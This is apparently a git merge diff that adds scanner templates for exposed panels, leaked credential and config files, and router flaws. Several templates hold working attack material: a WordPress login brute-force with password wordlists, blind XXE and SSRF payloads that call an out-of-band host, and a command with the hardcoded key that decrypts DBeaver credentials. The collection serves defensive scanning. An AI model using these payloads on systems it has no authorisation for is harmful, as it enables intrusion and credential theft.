Merge remote-tracking branch 'origin' into dynamic_attributes

exposed-panels/tectuus-scada-monitor.yaml

@@ -0,0 +1,24 @@
+id: tectuus-scada-monitor
+
+info:
+  name: Tectuus SCADA Monitor
+  author: geeknik
+  severity: info
+  reference: https://www.tectuus.mx/
+  tags: panel,tectuus,scada
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<title>SCADAmonitor</title>"
+        part: body

exposed-panels/tracer-sc-login.yaml

@@ -0,0 +1,28 @@
+id: tracer-sc-login
+
+info:
+  name: Tracer SC login panel
+  author: geeknik
+  severity: info
+  reference: https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html
+  tags: tracer,trane,iot,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/hui/index.html"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<title>Tracer SC</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

exposures/apis/couchbase-buckets-api.yaml

@@ -0,0 +1,33 @@
+id: couchbase-buckets-api
+
+info:
+  name: Couchbase Buckets REST API - Unauthenticated
+  author: geeknik
+  severity: info
+  reference:
+    - https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html
+    - https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html
+  tags: exposure,couchbase
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pools/default/buckets"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - '"couchbase":'
+          - '"bucket":'
+          - '"data":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'

exposures/configs/dbeaver-credentials.yaml

@@ -0,0 +1,26 @@
+id: dbeaver-credentials
+
+info:
+  name: DBeaver Credential Exposure
+  author: geeknik
+  severity: info
+  tags: exposure,dbeaver
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.dbeaver/credentials-config.json"
+
+    # To decode the credentials file, use following command:
+    # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "application/octet-stream"
+        part: header

exposures/configs/firebase-config-exposure.yaml

@@ -0,0 +1,29 @@
+id: firebase-config-exposure
+
+info:
+  name: Firebase Config Exposure
+  author: geeknik
+  reference: https://github.com/firebase/firebaseui-web/blob/master/demo/public/sample-config.js
+  severity: high
+  tags: firebase,exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/public/config.js"
+      - "{{BaseURL}}/config.js"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "apiKey:"
+          - "authDomain:"
+          - "databaseURL:"
+          - "storageBucket:"
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposures/configs/zend-config-file.yaml

@@ -2,7 +2,7 @@ id: zend-config-file
 
 info:
   name: Zend Configuration File
-  author: pdteam
+  author: pdteam,geeknik
   severity: high
   tags: config,exposure,zend,php
 
@@ -10,12 +10,26 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/application/configs/application.ini"
+      - "{{BaseURL}}/admin/configs/application.ini"
+      - "{{BaseURL}}/application.ini"
+      - "{{BaseURL}}/aplicacao/application/configs/application.ini"
+      - "{{BaseURL}}/cloudexp/application/configs/application.ini"
+      - "{{BaseURL}}/cms/application/configs/application.ini"
+      - "{{BaseURL}}/moto/application/configs/application.ini"
+      - "{{BaseURL}}/Partners/application/configs/application.ini"
+      - "{{BaseURL}}/radio/application/configs/application.ini"
+      - "{{BaseURL}}/seminovos/application/configs/application.ini"
+      - "{{BaseURL}}/shop/application/configs/application.ini"
+      - "{{BaseURL}}/site_cg/application/configs/application.ini"
+      - "{{BaseURL}}/slr/application/configs/application.ini"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "resources.db.params.password"
+          - "resources.db.params.username"
+        condition: and
 
       - type: word
         words:

exposures/files/db-schema.yaml

@@ -0,0 +1,35 @@
+id: db-schema
+
+info:
+  name: Discover db schema files
+  author: geeknik
+  severity: info
+  description: This file is auto-generated from the current state of the database.
+  tags: exposure,backup
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/db/schema.rb"
+      - "{{BaseURL}}/database/schema.rb"
+      - "{{BaseURL}}/schema.rb"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "This file is auto-generated from the current state of the database."
+          - "ActiveRecord::Schema.define"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        regex:
+          - 'eRecord::Schema\.define\(version: ([0-9_]+)\) do'

exposures/logs/django-debug-exposure.yaml

@@ -0,0 +1,28 @@
+id: django-debug-exposure
+
+info:
+  name: Django Debug Exposure
+  author: geeknik
+  reference: https://twitter.com/Alra3ees/status/1397660633928286208
+  severity: high
+  tags: django,exposure
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/admin/login/?next=/admin/"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+
+      - type: word
+        part: body
+        words:
+          - "DB_HOST"
+          - "DB_NAME"
+          - "DJANGO"
+          - "ADMIN_PASSWORD"
+        condition: and

exposures/tokens/docker/dockercfg-config.yaml

@@ -0,0 +1,32 @@
+id: dockercfg-config
+
+info:
+  name: Detect .dockercfg
+  author: geeknik
+  severity: high
+  description: Docker registry authentication data
+  tags: docker,exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.dockercfg"
+      - "{{BaseURL}}/.docker/config.json"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '"email":'
+          - '"auth":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200

fuzzing/wordpress-weak-credentials.yaml

@@ -0,0 +1,37 @@
+id: wordpress-weak-credentials
+
+info:
+  name: WordPress Weak Credentials
+  author: evolutionsec
+  severity: critical
+  tags: wordpress,default-login,fuzz
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{BaseURL}}
+
+        log={{users}}&pwd={{passwords}}
+
+    payloads:
+      users: helpers/wordlists/wp-users.txt
+      passwords: helpers/wordlists/wp-passwords.txt
+    threads: 50
+    attack: clusterbomb
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+
+      - type: word
+        words:
+          - '/wp-admin'
+          - 'wordpress_logged_in'
+        condition: and
+        part: header

helpers/wordlists/wp-passwords.txt

@@ -0,0 +1,23 @@
+admin
+123456
+password
+12345678
+666666
+111111
+1234567
+qwerty
+siteadmin
+administrator
+root
+123123
+123321
+1234567890
+letmein123
+test123
+demo123
+pass123
+123qwe
+qwe123
+654321
+loveyou
+adminadmin123

helpers/wordlists/wp-users.txt

@@ -0,0 +1,11 @@
+adm
+admin
+user
+admin1
+hostname
+manager
+qwerty
+root
+support
+sysadmin
+test

vulnerabilities/generic/generic-blind-xxe.yaml

@@ -0,0 +1,26 @@
+id: generic-blind-xxe
+
+info:
+  name: Generic Blind XXE
+  author: geeknik
+  severity: high
+  tags: xxe,generic
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Referer: {{BaseURL}}
+
+
+        <?xml version="1.0"?>
+        <!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
+        <foo>&e1;</foo>
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"

vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml

@@ -0,0 +1,31 @@
+id: xmlrpc-pingback-ssrf
+
+info:
+  name: XMLRPC Pingback SSRF
+  author: geeknik
+  reference: https://hackerone.com/reports/406387
+  severity: high
+  tags: ssrf,generic
+
+requests:
+  - raw:
+      - |
+        POST /xmlrpc/pingback HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+        <?xml version="1.0" encoding="UTF-8"?>
+        <methodCall>
+        <methodName>pingback.ping</methodName>
+        <params>
+        <param>
+        <value>http://{{interactsh-url}}</value>
+        </param>
+        </params>
+        </methodCall>
+
+    matchers:
+      - type: word
+        part: interactsh-protocol
+        words:
+          - "http"

vulnerabilities/other/comtrend-password-exposure.yaml

@@ -0,0 +1,26 @@
+id: comtrend-passsword-exposure
+
+info:
+  name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
+  author: geeknik
+  severity: high
+  reference: https://www.exploit-db.com/exploits/16275
+  tags: router,exposure,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/password.cgi"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "pwdAdmin ="
+          - "pwdSupport ="
+          - "pwdUser ="
+        condition: and

vulnerabilities/other/netgear-router-exposure.yaml

@@ -0,0 +1,42 @@
+id: netgear-router-exposure
+
+info:
+  name: Netgear Router S/N Disclosure
+  description: Multiple Netgear router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled.
+  reference:
+    - https://www.exploit-db.com/exploits/47117
+    - https://www.exploit-db.com/exploits/45741
+  author: geeknik
+  severity: critical
+  tags: netgear,exposure,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/rootDesc.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 501
+        condition: or
+
+      - type: word
+        words:
+          - "<serialNumber>"
+          - "<deviceType>"
+          - "<modelNumber>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/xml
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - "<serialNumber>([A-Z0-9]+)<\\/serialNumber>"

vulnerabilities/other/solar-log-authbypass.yaml

@@ -0,0 +1,32 @@
+id: solar-log-authbypass
+
+info:
+  name: Solar-Log 500 2.8.2 - Incorrect Access Control
+  author: geeknik
+  severity: high
+  description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
+  reference: https://www.exploit-db.com/exploits/49986
+  tags: solarlog,auth-bypass
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/lan.html"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "IPC@CHIP"
+
+      - type: word
+        part: body
+        words:
+          - " Solare Datensysteme GmbH"
+          - "mailto:info@solar-log.com"
+        condition: and